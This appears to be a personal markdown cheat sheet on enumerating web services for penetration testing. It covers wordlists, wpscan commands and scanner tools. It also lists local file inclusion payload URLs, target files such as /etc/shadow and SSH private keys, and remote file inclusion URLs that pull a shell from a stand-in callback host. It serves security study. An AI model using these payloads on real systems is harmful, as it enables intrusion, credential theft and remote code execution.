Enumerating Web Services.md

Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE!

Step 2:

Common Wordlists to use for Web App Scanning:

Common Wordlists to use for Web Directory Scanning:

• /usr/share/wordlists/dirb/common.txt
• /usr/share/wordlists/dirbuster/*.txt
• /usr/share/wordlists/wfuzz/general/*.txt
• /usr/share/seclists/Discovery/Web-Content/
• Assetnote Wordlists: https://wordlists.assetnote.io/
• Jhaddix Content Discovery: https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10

Common Wordlists to use for User Enumeration Scanning:

• /usr/share/seclists/Usernames
• /usr/share/wordlists/dirbuster/apache-user-enum-2.0

Web App Scanners

Wpscan(WordPress Scannner):

• wpscan --url
• wpscan --url --enumerate ap at (All Plugins, All Themes)
• wpscan --url --enumerate u (Usernames)
• wpscan --url --enumerate v

Other Tools:

• Burp Suite
• OWASP Zap
• Cadaver
• SQLMap
• Joomscan
• Feroxbuster

Testing for LFI:

https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf

Examples:

http://example.com/index.php?page=etc/passwd http://example.com/index.php?page=etc/passwd%00 http://example.com/index.php?page=../../etc/passwd http://example.com/index.php?page=%252e%252e%252f http://example.com/index.php?page=....//....//etc/passwd

Interesting Files:

Linux:

/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa

Windows:

/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM

Testing for RFI:

http://example.com/index.php?page=http://callback.com/shell.txt http://example.com/index.php?page=http://callback.com/shell.txt%00 http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt

Resources

• Turning LFI to RFI: https://l.avala.mp/?p=241 Backup: https://web.archive.org/web/20210612222732/https://l.avala.mp/?p=241